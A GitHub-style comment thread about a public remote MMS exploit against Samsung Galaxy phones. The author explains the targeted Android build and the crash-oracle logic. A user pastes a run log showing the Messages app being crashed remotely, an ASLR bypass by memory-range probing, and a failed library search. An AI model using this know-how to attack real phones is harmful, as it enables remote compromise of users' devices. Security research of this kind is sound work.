j00ru
commented
2 years ago The exploit was written for Samsung Galaxy Note 10+ with Android 10 (February 2020 patch level). It won't work with Android 9, or even with other builds of Android 10 without adjusting some things in the config file and/or script.
In your case, the oracle seems to be returning too many "True" results, which indicates that the app doesn't always crash when it should. This may suggest that either the heap behaves differently than expected and the two allocations are not adjacent, or that the layout of some object (e.g. the Bitmap) is different. To figure out the exact problem, you'd have to debug the test phone to see which assumption is broken. This part of the exploit is described in detail in MMS Exploit Part 3: Constructing the Memory Corruption Primitives.
Hi, I try to reproduce the whole exploitation on :
in FindRegionMethod3 assert(len(candidates) > 0) AssertionError
It seems that the candidates for libhwui.so is always empty. What is the reason for not being able to find candidates? Thanks!
2022-04-12 03:56:29,396 [INFO ] Sending test MMS to check if the device is online... 2022-04-12 03:56:41,433 [INFO ] Received ack, phone is up and the setup works. 2022-04-12 03:56:41,433 [INFO ] Crashing the Messages app remotely now to get a clean state for further exploitation. 2022-04-12 03:56:43,716 [INFO ] Starting the ASLR bypass process... 2022-04-12 03:58:02,473 [INFO ] Range [6f00000000 .. 6f00000fff] is readable: True 2022-04-12 03:59:21,210 [INFO ] Range [6f00000000 .. 6f3fffffff] is readable: True 2022-04-12 03:59:21,210 [INFO ] Found address 0x6f00000000 inside CFI in 2 queries 2022-04-12 04:00:38,960 [INFO ] Range [6f00000000 .. 6f7fffffff] is readable: True 2022-04-12 04:01:57,634 [INFO ] Range [6f80000000 .. 6fbfffffff] is readable: True 2022-04-12 04:03:15,449 [INFO ] Range [6fc0000000 .. 6fdfffffff] is readable: True 2022-04-12 04:04:53,112 [INFO ] Range [6fe0000000 .. 6fefffffff] is readable: False 2022-04-12 04:06:00,705 [INFO ] Range [6fe0000000 .. 6fe7ffffff] is readable: False 2022-04-12 04:06:49,435 [INFO ] Range [6fe0000000 .. 6fe3ffffff] is readable: True 2022-04-12 04:26:12,124 [INFO ] Range [6fe4000000 .. 6fe5ffffff] is readable: True 2022-04-12 04:31:37,339 [INFO ] Range [6fe6000000 .. 6fe6ffffff] is readable: True 2022-04-12 04:32:57,045 [INFO ] Range [6fe7000000 .. 6fe77fffff] is readable: True 2022-04-12 04:34:15,726 [INFO ] Range [6fe7800000 .. 6fe7bfffff] is readable: True 2022-04-12 04:35:33,403 [INFO ] Range [6fe7c00000 .. 6fe7dfffff] is readable: True 2022-04-12 04:36:53,171 [INFO ] Range [6fe7e00000 .. 6fe7efffff] is readable: True 2022-04-12 04:38:14,960 [INFO ] Range [6fe7f00000 .. 6fe7f7ffff] is readable: True 2022-04-12 04:39:34,748 [INFO ] Range [6fe7f80000 .. 6fe7fbffff] is readable: True 2022-04-12 04:40:53,445 [INFO ] Range [6fe7fc0000 .. 6fe7fdffff] is readable: True 2022-04-12 04:42:12,143 [INFO ] Range [6fe7fe0000 .. 6fe7feffff] is readable: True 2022-04-12 04:43:29,804 [INFO ] Range [6fe7ff0000 .. 6fe7ff7fff] is readable: True 2022-04-12 04:45:07,474 [INFO ] Range [6fe7ff8000 .. 6fe7ffbfff] is readable: False 2022-04-12 04:46:02,276 [INFO ] Range [6fe7ff8000 .. 6fe7ff9fff] is readable: True 2022-04-12 04:47:22,056 [INFO ] Range [6fe7ffa000 .. 6fe7ffafff] is readable: True 2022-04-12 04:47:31,479 [INFO ] CFI region end 0x6fe7ffb000 found after 22 queries (0 cached) 2022-04-12 04:48:43,825 [INFO ] Range [6fe83fb000 .. 6fe83fbfff] is readable: True 2022-04-12 04:51:01,108 [INFO ] Range [6fe88fb000 .. 6fe88fbfff] is readable: True 2022-04-12 04:52:18,837 [INFO ] Range [6fe8dfb000 .. 6fe8dfbfff] is readable: True 2022-04-12 04:53:37,631 [INFO ] Range [6fe92fb000 .. 6fe92fbfff] is readable: True 2022-04-12 04:54:56,523 [INFO ] Range [6fe97fb000 .. 6fe97fbfff] is readable: True 2022-04-12 04:56:34,248 [INFO ] Range [6fe9cfb000 .. 6fe9cfbfff] is readable: False 2022-04-12 04:57:22,945 [INFO ] Range [6fe9bfb000 .. 6fe9bfbfff] is readable: True 2022-04-12 04:58:42,677 [INFO ] Range [6fea0fb000 .. 6fea0fbfff] is readable: True 2022-04-12 05:00:00,366 [INFO ] Range [6fea5fb000 .. 6fea5fbfff] is readable: True 2022-04-12 05:01:38,076 [INFO ] Range [6feaafb000 .. 6feaafbfff] is readable: False 2022-04-12 05:02:28,836 [INFO ] Range [6fea9fb000 .. 6fea9fbfff] is readable: True 2022-04-12 05:03:46,521 [INFO ] Range [6feaefb000 .. 6feaefbfff] is readable: True 2022-04-12 05:11:15,562 [INFO ] Range [6feb3fb000 .. 6feb3fbfff] is readable: True 2022-04-12 05:12:37,340 [INFO ] Range [6feb8fb000 .. 6feb8fbfff] is readable: True 2022-04-12 05:14:15,036 [INFO ] Range [6febdfb000 .. 6febdfbfff] is readable: False 2022-04-12 05:15:22,722 [INFO ] Range [6febcfb000 .. 6febcfbfff] is readable: False 2022-04-12 05:16:13,446 [INFO ] Range [6febbfb000 .. 6febbfbfff] is readable: True 2022-04-12 05:17:32,184 [INFO ] Range [6fec0fb000 .. 6fec0fbfff] is readable: True 2022-04-12 05:18:50,909 [INFO ] Range [6fec5fb000 .. 6fec5fbfff] is readable: True 2022-04-12 05:20:08,580 [INFO ] Range [6fecafb000 .. 6fecafbfff] is readable: True 2022-04-12 05:21:33,359 [INFO ] Range [6fecffb000 .. 6fecffbfff] is readable: True 2022-04-12 05:22:52,043 [INFO ] Range [6fed4fb000 .. 6fed4fbfff] is readable: True 2022-04-12 05:24:10,763 [INFO ] Range [6fed9fb000 .. 6fed9fbfff] is readable: True 2022-04-12 05:25:48,482 [INFO ] Range [6fedefb000 .. 6fedefbfff] is readable: False 2022-04-12 05:26:36,187 [INFO ] Range [6feddfb000 .. 6feddfbfff] is readable: True Traceback (most recent call last): File "C:\Users\Ledu\Desktop\SkCodecFuzzer\mms_exploit\exploit.py", line 445, in
main(sys.argv)
File "C:\Users\Ledu\Desktop\SkCodecFuzzer\mms_exploit\exploit.py", line 442, in main
exploit.Pwn()
File "C:\Users\Ledu\Desktop\SkCodecFuzzer\mms_exploit\exploit.py", line 315, in Pwn
libhwui_base = self.FindRegionMethod3(analysis_start_addr,
File "C:\Users\Ledu\Desktop\SkCodecFuzzer\mms_exploit\exploit.py", line 246, in FindRegionMethod3
assert(len(candidates) > 0)
AssertionError